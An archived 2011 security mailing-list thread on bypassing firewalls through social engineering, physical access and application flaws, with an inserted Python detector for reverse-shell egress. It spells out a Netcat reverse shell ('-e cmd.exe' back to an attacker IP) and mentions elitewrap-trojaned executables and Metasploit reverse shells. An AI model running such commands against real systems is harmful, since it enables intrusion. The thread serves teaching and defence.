Security Basics mailing list archives

FW: Re: Firewall question - how easy is it to get thru - Proof


From: "Rivest, Philippe" <PRivest () transforcecompany com>
Date: Mon, 28 Feb 2011 14:56:16 +0000

To conclude this post, I'd like to share my findings with everyone in a "resume".

First of all, thanks for everyone's answers; I appreciate your help greatly.

So my initial question was "how hard & how long would it take to directly attack a firewall to get to the SRV protected behind it?". You basically answered "don't do it".

You basically used "the easiest way" around the Firewall. I mean, why waste time on a door when the window is open? :P

Here's a list of the solutions/quick fixes that you provided to me:

1. Social engineering (humans)
   a. One of the posts showed me how to use the tool "elitewrap" that basically creates an .exe that can play a video AND in the background execute something else (that's an example). The goal was to use social engineering and have a user execute the file, while obtaining a reverse shell (I'll discuss this later).
2. Physical security
   a. Again, getting into the environment of the company is usually quite easy.
   b. We put wireless in here because you need to be "near" the access point.
3. Application issues
   a. This was one of the most popular vectors of attack. You stated, and I researched this, that applications are weaker than the OS and as such they should be attacked first. I found a report that showed that MS Office held (more or less) 20 of the top 30 vulnerabilities in late 2009 while the 10 others were related to Sun Java and Adobe.
   b. Of course you mentioned SQL INJECTION attacks.
   c. Also I saw someone post about protection for web applications, a "WAF" (web application firewall, a deep inspection FW).


To sum it up, I got my answer in a format I didn't expect. The Firewall is "hard" to attack while "easy" to bypass (with a potentially longer list!).

I thought that I knew how to use Netcat before I made this post, I was wrong. So just to help anyone looking up "Reverse Shell Netcat" on Google, here's what I found (with the help of one of you):

My_PC:
Netcat.exe -v -l -p 80

Victim's PC:
Netcat.exe IP_My_PC 80 -e cmd.exe

This will set "My PC" as the server (initially), listening on port 80 for ANY connection, while on the Victim's PC we execute netcat to connect on port 80 to MY_PC and, upon connection, execute cmd.exe (locally). What will happen is that on MY_PC you will get that CMD.EXE shell (the shell of the Victim's PC), thus bypassing the Firewall and getting the privileges of the local user on the Victim's PC.
Btw this is possible with SSH (encrypted, so the firewall or sysadmin won't get the transmitted msg).

I hope this helps! I know many of you already knew how to do it, but I'm gonna try and give a little back :-)


Thanks again guys,
Phil

 
Important: 
Please note that my new email address is privest () transforcecompany com
Please note that my new website address is http://www.transforcecompany.com

SVP Veuillez noter que ma nouvelle adresse courriel est privest () transforcecompany com
SVP Veuillez noter que ma nouvelle adresse web est http://www.transforcecompany.com
 
 

Philippe Rivest - CISA, CISSP, CEH, Network+, Server+, A+
TransForce Inc.
Internal auditor - Information security
Vérificateur interne - Sécurité de l'information
Linkedin: http://ca.linkedin.com/pub/philippe-rivest/20/19a/232
   
6600 Saint-François
Saint-Laurent (Quebec) H4S 1B7
Tel.: 514-331-4417
Fax: 514-856-7541
www.transforcecompany.com
 
 
 
 
 
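Detection-side counterpart to the Netcat reverse shell summarised above, as an added example that is not part of the original thread: it flags an outbound connection to port 80/443 from a non-browser process and a shell spawned by a process holding such a connection. The event format, process names and addresses are constructed, simplified Sysmon-like records, not real telemetry.

```python
"""Flag reverse-shell-style egress in constructed, Sysmon-like events.

Two heuristics drawn from the Netcat example in the thread (hypothetical
event format, not real Sysmon XML):
 1. an outbound connection to 80/443 from a process that is not an
    allow-listed browser (the "Netcat.exe IP_My_PC 80" half);
 2. a shell spawned by a process holding such a connection ("-e cmd.exe").
"""

BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
WEB_PORTS = {80, 443}

# Constructed sample events, not captured telemetry; 198.51.100.10 is a
# documentation address standing in for "IP_My_PC".
EVENTS = [
    {"type": "net", "pid": 3100, "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "initiated": True, "dst_ip": "203.0.113.5", "dst_port": 443},
    {"type": "proc", "pid": 5200, "image": r"C:\Windows\System32\cmd.exe",
     "parent_pid": 1000, "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "proc", "pid": 4243, "image": r"C:\Windows\System32\cmd.exe",
     "parent_pid": 4242, "parent_image": r"C:\Users\bob\Downloads\Netcat.exe"},
    {"type": "net", "pid": 4242, "image": r"C:\Users\bob\Downloads\Netcat.exe",
     "initiated": True, "dst_ip": "198.51.100.10", "dst_port": 80},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_suspicious(events):
    """Return (rule, pid, image) tuples for events matching either heuristic."""
    alerts = []
    # Pass 1: pids with outbound web-port connections. Two passes because the
    # order of process-create vs. network events is not guaranteed in telemetry.
    connected = {}
    for ev in events:
        if ev["type"] == "net" and ev["initiated"] and ev["dst_port"] in WEB_PORTS:
            connected[ev["pid"]] = basename(ev["image"])
    for pid, image in connected.items():
        if image not in BROWSERS:
            alerts.append(("non-browser egress on web port", pid, image))
    # Pass 2: shells whose parent process holds one of those connections.
    for ev in events:
        if ev["type"] == "proc" and basename(ev["image"]) in SHELLS \
                and ev["parent_pid"] in connected:
            alerts.append(("shell spawned by network-connected parent",
                           ev["pid"], basename(ev["image"])))
    return alerts
```

The browser allow-list is only a starting point; in practice the same logic is better fed from an egress proxy, since a forced proxy with no direct outbound route turns the connection in the example into a logged, deniable event rather than an open window.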

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Rivest, Philippe
Sent: 17 février 2011 15:21
To: John Morrison
Cc: security-basics () securityfocus com
Subject: RE: Re: Firewall question - how easy is it to get thru - Proof

Well, yes. 

I use 3 hacks, one of which is web based (IIS 5.0) which is old but works great in classes to show it. I copy files, get local admin, install services and end up with full domain admin privileges.
The 2 other hacks are made against the service (locally).

So with or without a firewall, I can still get everything done. I just don't put the firewall in because when I travel I already have a lot of equipment.

- For all those who are telling me IIS 5.0 is old and obsolete... I know. It's only to show management how it's made. I'm not fully aware of all the new hacks :P

Why the question?


-----Original Message-----
From: John Morrison [mailto:john.morrison101 () gmail com] 
Sent: 17 février 2011 15:18
To: Rivest, Philippe
Cc: security-basics () securityfocus com
Subject: Re: Re: Firewall question - how easy is it to get thru - Proof

Philippe,

Could you add a firewall to your seminar setup? And prove it works
through a firewall?

On 16 February 2011 19:23, Rivest, Philippe
<PRivest () transforcecompany com> wrote:
Thanks for the information, it is true that the easiest way to beat the firewall is to bypass it or use rules that allow the network transaction to occur, such as web browser attacks.

On the Metasploit note, I have to add that Metasploit is a great tool :)
In my current company I provide a hacking seminar of 3-4 hours and I show how to use Nessus & Metasploit together to perform 3 different hacks, 2 of which give a reverse meterpreter shell. Everyone is surprised at how "easy" and "quick" it is once you identify the vulnerability.

That's one of the sources of my initial question. I'm always challenged on "Well, in your seminar you have no firewall"... It kinda bugs me that people put so much trust in that technology alone. That's why I'd like to get information & papers that show how easy it is to simply break/attack the firewall directly and (between you and me) own it.


-----Original Message-----
From: Shane Anglin [mailto:shane.anglin () gmail com]
Sent: 16 février 2011 14:19
To: security-basics () securityfocus com; Rivest, Philippe
Subject: RE: Re: Firewall question - how easy is it to get thru - Proof

Some detail on how such a thing can occur. Somehow, the 'bad guy' tricks a target LAN user into connecting his web browser to the bad guy's web server/page (phishing, social engineering, etc). The requested web page maliciously loads some web browser exploit on the target LAN user's machine, and the exploit runs. The exploit could, for example, be one that simply opens up a session reversed back to the bad guy's web server. And now the bad guy has a link inside the target LAN network via the target LAN machine to scan from, load more code onto the target LAN machine, etc., all happening over HTTP (port 80) or HTTPS (port 443) that the target LAN user initiated, and occurring within the allowed firewall rules, demonstrating that firewall technology alone is not a magic pill. Metasploit is a great tool to perform such attacks. I suggest reading a bit on Metasploit's meterpreter reverse tcp basics.

Regards,
Shane Anglin
Shane.Anglin () gmail com
